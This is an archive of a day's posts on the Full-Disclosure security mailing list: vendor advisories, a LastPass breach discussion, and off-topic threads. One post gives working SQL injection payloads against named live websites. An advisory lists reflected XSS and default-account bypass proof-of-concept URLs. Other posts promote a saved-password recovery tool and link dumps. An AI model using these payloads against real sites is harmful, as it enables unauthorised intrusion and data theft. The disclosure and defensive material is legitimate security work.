[Full-disclosure] [USN-1122-2] Thunderbird vulnerabilities

2011-05-05 Thread Micah Gersten
==
Ubuntu Security Notice USN-1122-2
May 05, 2011

thunderbird vulnerabilities
==

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 11.04

Summary:

Thunderbird could be made to run programs as your login if it opened
specially crafted mail.

Software Description:
- thunderbird: mail/news client with RSS and integrated spam filter support

Details:

USN-1122-1 fixed vulnerabilities in Thunderbird for Lucid and Maverick.
This update provides the corresponding fixes for Natty.

Original advisory details:

 It was discovered that there was a vulnerability in the memory handling of
 certain types of content. An attacker could exploit this to possibly run
 arbitrary code as the user running Thunderbird. (CVE-2011-0081)
 
 It was discovered that Thunderbird incorrectly handled certain JavaScript
 requests. If JavaScript were enabled, an attacker could exploit this to
 possibly run arbitrary code as the user running Thunderbird.
 (CVE-2011-0069)
 
 Ian Beer discovered a vulnerability in the memory handling of certain
 types of documents. An attacker could exploit this to possibly run
 arbitrary code as the user running Thunderbird. (CVE-2011-0070)
 
 Bob Clary, Henri Sivonen, Marco Bonardo, Mats Palmgren and Jesse Ruderman
 discovered several memory vulnerabilities. An attacker could exploit these
 to possibly run arbitrary code as the user running Thunderbird.
 (CVE-2011-0080)
 
 Aki Helin discovered multiple vulnerabilities in the HTML rendering code.
 An attacker could exploit these to possibly run arbitrary code as the user
 running Thunderbird. (CVE-2011-0074, CVE-2011-0075)
 
 Ian Beer discovered multiple overflow vulnerabilities. An attacker could
 exploit these to possibly run arbitrary code as the user running
 Thunderbird. (CVE-2011-0077, CVE-2011-0078)
 
 Martin Barbella discovered a memory vulnerability in the handling of
 certain DOM elements. An attacker could exploit this to possibly run
 arbitrary code as the user running Thunderbird. (CVE-2011-0072)
 
 It was discovered that there were use-after-free vulnerabilities in
 Thunderbird's mChannel and mObserverList objects. An attacker could exploit
 these to possibly run arbitrary code as the user running Thunderbird.
 (CVE-2011-0065, CVE-2011-0066)
 
 It was discovered that there was a vulnerability in the handling of the
 nsTreeSelection element. An attacker sending a specially crafted E-Mail
 could exploit this to possibly run arbitrary code as the user running
 Thunderbird. (CVE-2011-0073)
 
 Paul Stone discovered a vulnerability in the handling of Java applets. If
 plugins were enabled, an attacker could use this to mimic interaction with
 form autocomplete controls and steal entries from the form history.
 (CVE-2011-0067)
 
 Soroush Dalili discovered a vulnerability in the resource: protocol. This
 could potentially allow an attacker to load arbitrary files that were
 accessible to the user running Thunderbird. (CVE-2011-0071)
 
 Chris Evans discovered a vulnerability in Thunderbird's XSLT generate-id()
 function. An attacker could possibly use this vulnerability to make other
 attacks more reliable. (CVE-2011-1202)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 11.04:
  thunderbird 3.1.10+build1+nobinonly-0ubuntu0.11.04.1

After a standard system update you need to restart Thunderbird to make
all the necessary changes.

References:
  CVE-2011-0065, CVE-2011-0066, CVE-2011-0067, CVE-2011-0069,
  CVE-2011-0070, CVE-2011-0071, CVE-2011-0072, CVE-2011-0073,
  CVE-2011-0074, CVE-2011-0075, CVE-2011-0077, CVE-2011-0078,
  CVE-2011-0080, CVE-2011-0081, CVE-2011-1202

Package Information:
  
https://launchpad.net/ubuntu/+source/thunderbird/3.1.10+build1+nobinonly-0ubuntu0.11.04.1
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Leakdirectory: call for contribution

2011-05-05 Thread Fabio Pietrosanti (naif)
Hi guys,

we setup a wiki-based directory of leaksites and transparency ecosystem
available on:

http://leakdirectory.org

We would be pleased to have contribution in working on the wiki and on
the project.

Anonymous contributions are welcome, the wiki is open for editing.

-naif



Re: [Full-disclosure] Facebook

2011-05-05 Thread Cal Leeming
+1.

General rule of thumb (which has served me well) is that the govt +
company who holds your info can do whatever they want. Laws are bent and
broken every single day by these people in charge. Sucks, I know, but that's
the world we live in, I'm afraid ;/


On Wed, May 4, 2011 at 1:46 PM, valdis.kletni...@vt.edu wrote:

 On Wed, 04 May 2011 15:13:37 +0300, n...@myproxylists.com said:
   found this
   Facebook Law Enforcement Guidelines
   
 http://exit.gulli.com/url/http://info.publicintelligence.net/Facebook2010.pdf
 
  
 
  Interesting. Their guideline does not say anything about a court order so
  we can assume they give all personal data upon request just like that.

 Welcome to the real world.


[Full-disclosure] conservative.ca SQLi

2011-05-05 Thread Sig Heil
http://www.conservative.ca/index.php?section_copy_id=21257ï 
http://www.conservative.ca/index.php?section_copy_id=21257%C3%AF ¿½ion_i' AND 
(SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT 
(CASE WHEN (3997=3997) THEN 1 ELSE 0 
END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM 
information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN

 I'll just leave this here

http://www.brymark.com/cboutique/index2.cfm?view=prodscatID=UNION/*a*/SELECT/*a*/0;--subcatID=446prodMakeID=5533#
 

http://www.conservative.ca/action_centre/enews_signup?language_id=%27

Re: [Full-disclosure] Facebook

2011-05-05 Thread Stephen
Amish not being in the regular databases cause they don't use
technology (i.e., like Facebook, or any of the other databases mentioned
previously). A better way to word It wouldn't just be a selective
subset but pretty much who, where,
when and probably why without too many non-Amish exceptions. would have
been It wouldn't just be a select subset of people, but basically the
who, where, when, and why of almost everyone, with little to no
exceptions (aside from the Amish and suchlike folk, who obviously don't
use technology). Make sense now? :D

On 05/04/2011 08:28 PM, Cal Leeming wrote:
 Forgive me for being dense but, what does non-Amish exceptions means??

 On Wed, May 4, 2011 at 11:49 AM, Michael Simpson
 mikie.simp...@gmail.com mailto:mikie.simp...@gmail.com wrote:

 On 4 May 2011 04:59, phil ja...@jabea.net
 mailto:ja...@jabea.net wrote:
 
  I don’t agree, google is by far the biggest database of what
 user want and
  look for. If you merge those database (google) and facebook that
 must make
  some leet profiling. (especially when you think that you can
 easily find
  where someone live with phone directory and you can match the ip
 by sector
  too to match the google database)
 

 some leet profiling
 if you look at what netflix (supposedly anonymised) + imdb was able to
 do, or the classic of AOL releasing their searches (again anonymised)
 then a join of google with facebook is quite a scary prospect.
 Especially as d of b + partial zip/postcode allows for
 re-identification most of the time (i believe that d of b + state =
 85% re-identification).
 It wouldn't just be a selective subset but pretty much who, where,
 when and probably why without too many non-Amish exceptions.

 mike



[Full-disclosure] Lastpass Security Issue

2011-05-05 Thread Ryan Sears
Hey all,

Early this morning the folks over at LastPass decided to issue a warning about 
a potential security issue based on the fact that they detected some anomalies 
in their logs. 

http://blog.lastpass.com/2011/05/lastpass-security-notification.html

Basically the post outlines the fact that even though they've investigated 
everything they can think of, they still noticed data potentially being 
exfiltrated from one of their DBs, as more information came out than was going 
in. Because of the fact they can't account for the traffic from any legitimate 
source, they're being paranoid and assuming the worst (that someone found a SQL 
injection presumably). 

Even though their passwords were all salted, they're still forcing everyone to 
change their master password. Those using 2-factor are relatively unaffected, 
although they have to change their master passwords as well. 

This might leave some people who use lastpass in 'Re-enable account hell', 
where they have their email password stored on lastpass, but can't verify and 
login to lastpass without clicking an activation link in their email. This can 
be solved by using one of the plugins in offline mode with your old master 
password. I'm not sure why they didn't mention it, but this has solved a lot of 
people's problems. 

All in all IMHO these guys take security quite seriously. They noticed an 
anomaly, investigated and hours later posted something about it on their blog. 
I'm not sure why no emails have been sent out, but there has been speculation 
that it would have taken too long 
(http://blog.lastpass.com/2011/05/lastpass-security-notification.html?showComment=1304571300013#c1232708813079521918),
 which I don't really agree with. That should've been their first step IMHO, 
and that's where they fell on their face a bit with all this.

They DO put impressive security measures into place when something does happen 
though, as seen in the XSS bug found. They implemented HSTS, X-Frame-Options, 
CSP, which I've only seen used in super rare cases:

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They're also implementing PBKDF2, so that makes me feel as though with every 
security issue they're dealing with they don't just identify and remediate, 
but actually restructure their infrastructure in order to hedge against any 
potential future attack vectors. I personally see this as the best response of 
any company I've ever seen from a security standpoint.

Thoughts?

Ryan

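The post above mentions two things about how LastPass stores master passwords: the hashes were salted, and PBKDF2 is being introduced. The following is an added example (editor's code, not LastPass's) that shows the difference the iterated KDF makes for a stolen credential table and how a legacy record gets upgraded at login time. The record formats, the iteration count and the `sha256$...` legacy layout are assumptions made here for illustration.

```python
"""Salted, iterated master-password storage with PBKDF2-HMAC-SHA256.

Constructed example (not LastPass's code). Shows per-user random salts,
an iterated KDF, a constant-time verify, and a transparent upgrade from an
assumed legacy single-round salted SHA-256 record when the user logs in.
"""
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 100_000             # assumed current cost; raise over time
LEGACY_PREFIX = "sha256"         # assumed legacy format: sha256$<salt hex>$<digest hex>
PBKDF2_PREFIX = "pbkdf2_sha256"  # pbkdf2_sha256$<iterations>$<salt hex>$<dk hex>


def legacy_salted_sha256(password: str, salt: bytes) -> str:
    """Single-round salted hash. The salt defeats precomputed tables but does
    nothing to slow an offline search over a stolen record."""
    digest = hashlib.sha256(salt + password.encode("utf-8")).hexdigest()
    return f"{LEGACY_PREFIX}${salt.hex()}${digest}"


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Derive a PBKDF2-HMAC-SHA256 record with a fresh 16-byte random salt."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{PBKDF2_PREFIX}${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute from the parameters stored in the record and compare in
    constant time, so a mismatch leaks nothing through timing."""
    parts = record.split("$")
    if parts[0] == PBKDF2_PREFIX and len(parts) == 4:
        _, iterations, salt_hex, dk_hex = parts
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(dk.hex(), dk_hex)
    if parts[0] == LEGACY_PREFIX and len(parts) == 3:
        _, salt_hex, _digest = parts
        expected = legacy_salted_sha256(password, bytes.fromhex(salt_hex))
        return hmac.compare_digest(expected, record)
    return False


def needs_rehash(record: str, min_iterations: int = ITERATIONS) -> bool:
    """True when the record is legacy or was stored below the current cost."""
    parts = record.split("$")
    if parts[0] != PBKDF2_PREFIX:
        return True
    return int(parts[1]) < min_iterations


def verify_and_upgrade(password: str, record: str,
                       min_iterations: int = ITERATIONS) -> Tuple[bool, Optional[str]]:
    """Login-time check. Returns (ok, new_record): new_record is a fresh
    PBKDF2 record to write back when the password verified and the stored
    record is below policy, otherwise None. The plaintext is only available
    at login, which is why an upgrade has to happen here, or by forcing a
    password change as the post describes."""
    if not verify_password(password, record):
        return False, None
    if needs_rehash(record, min_iterations):
        return True, hash_password(password, iterations=min_iterations)
    return True, None


if __name__ == "__main__":
    rec = hash_password("correct horse battery staple")
    print(rec)
    print(verify_password("correct horse battery staple", rec))
```

Per-record salts mean two users with the same master password still get different records, and the iteration count is stored with the record so it can be raised later without invalidating existing logins.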


[Full-disclosure] t2'11: Call for Papers 2011 (Helsinki / Finland)

2011-05-05 Thread Tomi Tuominen
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


  # t2'11 - Call For Papers #
  Helsinki, Finland
October 27 - 28, 2011

We are pleased to announce the annual t2'11 infosec conference, which
will take place in Helsinki, Finland, from October 27 to 28, 2011.

We are looking for original technical presentations in the fields of
information security. Presentations should last a minimum of 60 minutes
and a maximum of two hours and be presented in English.

Please note that presentations that focus on marketing or directly
promoting a company's products will not be accepted.

We will be accepting talk proposals until July 1, 2011. All submitted
presentations will be reviewed by the t2 Advisory Board.

As usual, selected speakers will be reimbursed for travel and hotel
costs. We also pride ourselves on taking good care of the speakers, and
there is always something going on during the evenings :)

We suggest strongly that you submit earlier rather than later, since we
will close the CFP early once we receive enough quality submissions to
fill the slots.

Please include the following with your submission:

   1. Contact information (email, cell phone and postal address)
   2. Country and city of origin for your travel to the conference,
  as well as nationality/passport for visa requirements
   3. Brief biography (including employer and/or affiliations)
   4. Title of the presentation
   5. Presentation abstract
   6. If your presentation references a paper or piece of software that
  you have published, please provide us with either a copy of the
  said paper or software, or an URL where we can obtain it.
   7. List any other publications or conferences where this material
  has been or will be published/submitted

Please send the above information to cfp-2011 (at) lists.t2.fi

===

For more information:
http://t2.fi/

Links to past schedules:
http://t2.fi/schedules/

- -- 
 Tomi 'T' Tuominen tomi.tuomi...@t2.fi
 Founder - t2 information security conference
 tel. +358 400 796 064 - fax. +358 401 796 064


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAk3Cr00ACgkQlPoxKJv6bEqbpQCglRzCUNkuEnRUpToR70+vaGM3
NewAn0fu9aEH/kub/GmFHqCMZuprNnxY
=wAE6
-END PGP SIGNATURE-



Re: [Full-disclosure] Latvenergo RIGAS HES-2 HACKED!

2011-05-05 Thread Zhang Xinghu
Screenshot from Latvenergo Valmeria substation Router:
http://imageshack.us/photo/my-images/864/111nk.png/

[Full-disclosure] Filezilla Password Decryptor Released !

2011-05-05 Thread Nagareshwar Talekar
Hi all,

FileZillaPasswordDecryptor is a FREE tool to quickly scan and recover FTP
login passwords stored by FileZilla, the most popular FTP client software.

For more details and download visit,
http://securityxploded.com/filezilla-password-decryptor.php

-- 
With Regards
Nagareshwar Talekar

[Full-disclosure] PR10-13: Multiple XSS and Authentication flaws within BMC Remedy Knowledge Management

2011-05-05 Thread research
PR10-13: Multiple XSS and Authentication flaws within BMC Remedy
Knowledge Management

Vulnerability found: 17th July 2010

Vendor informed:

Vulnerability fixed:

Severity: High

Description:

BMC Remedy Knowledge Management provides service desk analysts with a
knowledge base of easy-to-find solutions and gives users self-service
search options to help them resolve issues on their own. ProCheckUp has
discovered that multiple Remedy Knowledge Management pages are
vulnerable to reflective XSS attacks, and that a built-in self-help
account allows for authentication bypass.

Version: 7.5.00- http://www.bmc.com/


1) The following demonstrate the reflective XSS flaws

https://target-domain.foo/rkm/external.jsp?doc='%3balert(1)//user=Self+Help

https://target-domain.foo/rkm/search.jsp?user=Self+HelpstartDate=\'%3balert(1)//

https://target-domain.foo/rkm/usersettings.jsp?;scriptalert(1)/script

https://target-domain.foo/rkm/viewdoc.jsp?doc=scriptalert(1)/scriptuser=Self%20Help

Works on IE - login screen referrer XSS
https://target-domain.foo/rkm/AttachmentServlet?=;scriptalert(1)/script

Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties.

2) Remedy Knowledge Management is vulnerable to authentication bypass
by using a built-in default account. (user=Self%20Help)

https://target-domain.foo/rkm/index.jsp?user=Self%20Help

The following directory requires a password to authenticate only
https://target-domain.foo/rkm/configuration


Consequences:
An attacker may be able to gain access to data held within a Remedy
Knowledge Management based site.


Fix:
.

References:
http://www.procheckup.com/Vulnerabilities.php

Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

Legal:
Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
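Section 1 of the advisory shows the same parameter reflected into two different output contexts: a JavaScript string literal (`doc='%3balert(1)//`) and the HTML body (`doc=<script>alert(1)</script>`). The fix differs per context, which is the point the following added example makes. It is editor's code, not ProCheckUp's or BMC's, and the page renderer, its `doc` parameter and the check functions are constructed for illustration; it is written in Python rather than the product's JSP so it can be run stand-alone.

```python
"""Context-aware output encoding for a reflected request parameter.

Constructed example (not the vendor's code): a minimal renderer with a
deliberately vulnerable variant that reflects raw input, and a hardened
variant that picks an encoder per output context. Two checks verify that
the hardened output keeps the input as data in both contexts.
"""
import html
import json
import re

# Characters that must never appear raw inside an inline <script> block.
# json.dumps already escapes quotes, backslashes and control characters; these
# cover HTML-significant characters and the JS line terminators U+2028/U+2029
# (ensure_ascii already escapes the latter; the entries are kept explicit).
_JS_EXTRA = {
    "<": "\\u003c", ">": "\\u003e", "&": "\\u0026",
    "'": "\\u0027", "\u2028": "\\u2028", "\u2029": "\\u2029",
}


def js_string_literal(value: str) -> str:
    """Encode value as a double-quoted JS string literal safe for an inline script."""
    literal = json.dumps(value, ensure_ascii=True)
    return "".join(_JS_EXTRA.get(ch, ch) for ch in literal)


def html_text(value: str) -> str:
    """Encode value for an HTML text node or a quoted attribute value."""
    return html.escape(value, quote=True)


def render_vulnerable(doc: str) -> str:
    """The pattern behind the advisory's findings: raw reflection in two contexts."""
    return (f"<h1>Document: {doc}</h1>\n"
            f"<script>var doc = '{doc}';</script>")


def render_hardened(doc: str) -> str:
    """Same page with an encoder chosen for each output context."""
    return (f"<h1>Document: {html_text(doc)}</h1>\n"
            f"<script>var doc = {js_string_literal(doc)};</script>")


_SCRIPT_RE = re.compile(r"<script>var doc = (.*?);</script>", re.S)


def script_value_round_trips(page: str, original: str) -> bool:
    """True when the inline script's literal decodes back to the original
    value, i.e. the input stayed data and no part of it became code. A
    single-quoted or broken-out literal is not valid JSON, so the vulnerable
    render never passes."""
    m = _SCRIPT_RE.search(page)
    if not m:
        return False
    try:
        return json.loads(m.group(1)) == original
    except json.JSONDecodeError:
        return False


def contains_extra_script_tag(page: str) -> bool:
    """Crude HTML-context check: any <script> tag beyond the one we emit."""
    return page.count("<script>") > 1


if __name__ == "__main__":
    for payload in ("';alert(1)//", "<script>alert(1)</script>"):
        print(render_vulnerable(payload))
        print(render_hardened(payload))
```

HTML entity encoding alone does not help inside a `<script>` block, because the browser does not decode entities there; the value has to be emitted as a JS literal with `<`, `>`, `&` and quotes written as `\uXXXX` escapes so that neither `</script>` nor a closing quote can end the context early.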



Re: [Full-disclosure] Lastpass Security Issue

2011-05-05 Thread Benji
They've said nothing about what they're going to do to the server with said
anomaly. Wouldn't be happy until a full reinstall.

On Thu, May 5, 2011 at 11:39 AM, Ryan Sears rdse...@mtu.edu wrote:

 [...]

Re: [Full-disclosure] Lastpass Security Issue

2011-05-05 Thread Nick Boyce
On Thu, May 5, 2011 at 9:09 PM, Benji m...@b3nji.com wrote:

 They've said nothing about what they're going to do to the server
 with said anomaly. Wouldnt be happy until a full reinstall.

From http://blog.lastpass.com/2011/05/lastpass-security-notification.html :

  We're rebuilding the boxes in question and have shut down and
  moved services from them in the meantime. The source code
  running the website and plugins has been verified against our
  source code repositories, and we have further determined from
  offline snapshots and cryptographic hashes in the repository
  that there was no tampering with the repository itself

Is that what you meant ?

Nick
--
Current Earth status:   NOT DESTROYED



Re: [Full-disclosure] Lastpass Security Issue

2011-05-05 Thread Benji
Sorry, completely missed that part. My bad.

On Thu, May 5, 2011 at 10:35 PM, Nick Boyce nick.bo...@gmail.com wrote:

 [...]

[Full-disclosure] 0dayz on the 0day

2011-05-05 Thread Infant Overflow
Oh SNAP!  SpongeBob got pwnd!

http://pastebin.com/X9SBeH2c

Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n
Train

Re: [Full-disclosure] Stuxnet

2011-05-05 Thread Cal Leeming
?

On Wed, May 4, 2011 at 10:40 PM, huj huj huj datski...@gmail.com wrote:

 thank you


 2011/5/4 Cal Leeming c...@foxwhisper.co.uk

  Lol huj, this conversation is over.


 On 04/05/2011 11:16, huj huj huj wrote:

 if there were any justice in the world people like you would be infertile

 2011/5/4 Cal Leeming f...@foxwhisper.co.uk

  Not even sure why I'm bothering to respond to this, given the fact
 you're just trolling.. but.. You ever considered the fact I have children?
 lol.  When you have kids, you soon learn to love everything that your kids
 love.. But given the fact you are still a young'un, I wouldn't expect you to
 understand.

 And also, Njijnte is awesome ;p


 On 04/05/2011 11:02, huj huj huj wrote:

 let's just say i don't have japanese childrens posters on my walls..

 2011/5/2 Cal Leeming c...@foxwhisper.co.uk

 Out of curiosity huj huj huj, how old are you? At the very least, are
 you older than me??

  On Mon, May 2, 2011 at 7:51 PM, huj huj huj datski...@gmail.comwrote:

 probably not so much stealing as making fun of your teenie way of
 expressing yourself :)


 2011/5/1 Cal Leeming c...@foxwhisper.co.uk

 Lol @ you stealing my lots of love and xoxo signature... At least
 come up with your own stuff ;)

  On Sun, May 1, 2011 at 5:58 PM, Benji m...@b3nji.com wrote:

  dude if
 you can't appreciate sharing, it's
 a better idea to be

 in silent mode.

 understand this:
 =
 you != everyone in FD
 hence , you 'know' != everyone in FD knows
 =

 Have you guys heard, recently (July 2010) a new form of malware that 
 seemed to target SCADA systems was found, named Stuxnet.

 Some interesting info here; http://en.wikipedia.org/wiki/Stuxnet

 Also it contains 6 Windows 0days!!!

 Anyway, thought you might not know due to FD members apparent inability 
 to read the news.

 Lots of love,

  Benji xoxox



[Full-disclosure] rfxn tools.. anyone tried them?

2011-05-05 Thread Cal Leeming
Just came across this:

http://www.rfxn.com/projects/

APF (Advanced Policy
Firewall)http://www.rfxn.com/projects/advanced-policy-firewall/
BFD (Brute Force Detection)http://www.rfxn.com/projects/brute-force-detection/
IRSYNC (Incremental
Rsync)http://www.rfxn.com/projects/irsync-incremental-rsync/
LES (Linux Environment
Security)http://www.rfxn.com/projects/linux-environment-security/
LMD (Linux Malware Detect)http://www.rfxn.com/projects/linux-malware-detect/
LSM (Linux Socket Monitor) http://www.rfxn.com/linux-socket-monitor/
NSIV (Network Socket Inode
Validation)http://www.rfxn.com/projects/network-socket-inode-validation/
PRM (Process Resource
Monitor)http://www.rfxn.com/projects/process-resource-monitor/
SIM (System Integrity
Monitor)http://www.rfxn.com/projects/system-integrity-monitor/
SPRI (System Priority) http://www.rfxn.com/projects/system-priority/

Anyone tried any of these tools out? Gonna have a play around with them
tonight :)

Cal

Re: [Full-disclosure] Lastpass Security Issue

2011-05-05 Thread Cal Leeming
+1 reason why people should never use centralized password / form storage
tbh.

On Thu, May 5, 2011 at 10:09 PM, Benji m...@b3nji.com wrote:

 [...]

[Full-disclosure] Security Advisory: DNS BIND Security Advisory: RRSIG Queries Can Trigger Server Crash When Using Response Policy Zones

2011-05-05 Thread Barry Greene

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: https://www.isc.org/CVE-2011-1907 is the authoritative source
for this Security Advisory. Please check the source for any updates.

Summary: When a name server is configured with a response policy zone
(RPZ), queries for type RRSIG can trigger a server crash.

CVE: CVE-2011-1907
Posting date: 05 May 2011
Program Impacted: BIND
Versions affected: 9.8.0
Severity: High
Exploitable: remotely

Description: This advisory only affects BIND users who are using the
RPZ feature configured for RRset replacement. BIND 9.8.0 introduced
Response Policy Zones (RPZ), a mechanism for modifying DNS responses
returned by a recursive server according to a set of rules which are
either defined locally or imported from a reputation provider. In
typical configurations, RPZ is used to force NXDOMAIN responses for
untrusted names. It can also be used for RRset replacement, i.e.,
returning a positive answer defined by the response policy. When RPZ
is being used, a query of type RRSIG for a name configured for RRset
replacement will trigger an assertion failure and cause the name
server process to exit.

Workarounds: Install 9.8.0-P1 or higher.

Active exploits: None. However, some DNSSEC validators are known to
send type=RRSIG queries, innocently triggering the failure.

Solution: Use RPZ only for forcing NXDOMAIN responses and not for
RRset replacement.
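As an added example (not part of ISC's advisory or of BIND itself), the following Python shows how an operator could tell whether the affected configuration is in use and whether RRSIG queries are already reaching it: it reads a constructed RPZ zone fragment to find names configured for RRset replacement, scans constructed BIND-style query log lines for type RRSIG queries against those names, and checks a version string against the single affected release. The zone data, log lines, querylog format and function names are all assumptions.

```python
import re

# Constructed RPZ zone fragment (not from the advisory): "CNAME ." forces NXDOMAIN,
# "CNAME *." forces NODATA; any other RDATA is the RRset replacement the advisory covers.
RPZ_ZONE = """\
bad.example.net     CNAME .
*.tracker.example   CNAME *.
walled.example.com  A     192.0.2.100
"""

# Constructed BIND 9.8-style query log lines (querylog format assumed).
QUERY_LOG = """\
client 192.0.2.10#53211: query: www.example.com IN A + (192.0.2.53)
client 192.0.2.11#41022: query: walled.example.com IN RRSIG + (192.0.2.53)
client 192.0.2.12#49871: query: bad.example.net IN RRSIG + (192.0.2.53)
client 192.0.2.13#50001: query: walled.example.com IN A +E (192.0.2.53)
"""

QUERY_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<type>\S+) ")

def replacement_names(zone_text):
    """Owner names the policy answers positively, i.e. RRset replacement."""
    names = set()
    for line in zone_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        owner, rtype, rdata = parts[0].lower().rstrip("."), parts[1].upper(), parts[2]
        if rtype == "CNAME" and rdata in (".", "*."):
            continue  # NXDOMAIN / NODATA policies are not the affected configuration
        names.add(owner)
    return names

def rrsig_hits(log_text, replaced):
    """(client, name) pairs for type RRSIG queries that would reach a replacement name."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m or m.group("type") != "RRSIG":
            continue
        name = m.group("name").lower().rstrip(".")
        if name in replaced:
            hits.append((m.group("ip"), name))
    return hits

def affected_version(version):
    """Per the advisory only 9.8.0 is affected; 9.8.0-P1 and later carry the fix."""
    return version.strip() == "9.8.0"
```

Note that the RRSIG query for bad.example.net is not reported: that name is under an NXDOMAIN policy, which the advisory says is unaffected.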

CVSS Score: Base 6.1, adjusted for lack of targets, score is 1.5
(AV:N/AC:L/Au:N/C:N/I:N/A:C/E:P/RL:O/RC:C/TD:L)

For more information on the Common Vulnerability Scoring System and to
obtain your specific environmental score please visit:
http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2

Thank you to Mitsuru Shimamura at Internet Initiative Japan for
finding this defect.

For more information on support and other services for ISC's software
products, please visit
https://www.isc.org/community/blog/201102/BIND-support

For more information about DNS RPZ, please check security advisory @
https://www.isc.org/CVE-2011-1907

Questions about this Security Advisory should be sent to the ISC
Security Officer security-offi...@isc.org.



[Full-disclosure] VMSA-2011-0008 VMware vCenter Server and vSphere Client security vulnerabilities

2011-05-05 Thread VMware Security Team
------------------------------------------------------------------------
   VMware Security Advisory

Advisory ID:   VMSA-2011-0008
Synopsis:      VMware vCenter Server and vSphere Client security
               vulnerabilities
Issue date:    2011-05-05
Updated on:    2011-05-05 (initial release of advisory)
CVE numbers:   CVE-2011-0426 CVE-2011-1788 CVE-2011-1789
------------------------------------------------------------------------

1. Summary

   VMware vCenter Server directory traversal and information disclosure
   vulnerabilities. vSphere Client Installer is delivered through an
   unsigned package.

2. Relevant releases

   vCenter Server 4.1 GA
   vCenter Server 4.0 Update 2 and earlier
   VirtualCenter 2.5 Update 6 and earlier

   ESXi 4.1 GA
   ESXi 4.0 without patch ESXi400-201103402-SG

   ESX 4.1 GA
   ESX 4.0 without patch ESX400-201103401-SG

3. Problem Description

  a. vCenter Server Directory Traversal vulnerability

A directory traversal vulnerability allows an attacker to remotely
retrieve files from vCenter Server without authentication. In order
to exploit this vulnerability, the attacker will need to have access
to the network on which the vCenter Server host resides.

In case vCenter Server is installed on Windows 2008 or
Windows 2008 R2, the security vulnerability is not present.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2011-0426 to this issue.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1 *
vCenter        4.0       Windows  Update 3 *
VirtualCenter  2.5       Windows  Update 6a

hosted **      any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected

   * vCenter 4.1 and vCenter 4.0 installed on Windows 2008 or Windows
     2008 R2 are not affected
  ** hosted products are VMware Workstation, Player, ACE, Fusion.

  b. vCenter Server SOAP ID disclosure

The SOAP session ID can be retrieved by any user that is logged in
to vCenter Server. This might allow a local unprivileged user on
vCenter Server to elevate his or her privileges.

VMware would like to thank Claudio Criscione for reporting this
issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-1788 to this issue.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  Update 3
VirtualCenter  2.5       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected

   * hosted products are VMware Workstation, Player, ACE, Fusion.

  c. vSphere Client Installer package not digitally signed

The digitally signed vSphere Client installer is packaged in a
self-extracting installer package which is not digitally signed. As
a result, when you run the install package file to extract and start
installing, the vSphere Client installer may display a Windows
warning message stating that the publisher of the install package
cannot be verified.
 
The vSphere Client Installer package of the following product
versions is now digitally signed:

  vCenter Server 4.1 Update 1
  vCenter Server 4.0 Update 3

  ESXi 4.1 Update 1
  ESXi 4.0 with patch ESXi400-201103402-SG

  ESX 4.1 Update 1
  ESX 4.0 with patch ESX400-201103401-SG

An install or update of the vSphere Client from these releases will
not present a security warning from Windows.
Note: typically the vSphere Client will request an update if the
existing client is pointed at a newer version of vCenter or ESX.

VMware Knowledge Base article 1021404 explains how the unsigned
install package can be obtained in an alternative, secure way for an
environment with VirtualCenter 2.5, ESXi/ESX 3.5 or ESX 3.0.3.

VMware would like to thank Claudio Criscione for reporting this
issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-1789 to this issue.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the checksum of your downloaded file.

   vCenter Server 4.1 Update 1
   ---
   See VMSA-2011-0003 for details.

   
   vCenter Server 4.0 Update 3
   ---
   http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0
   Release Notes:
   

Re: [Full-disclosure] Facebook

2011-05-05 Thread Jeffrey Walton
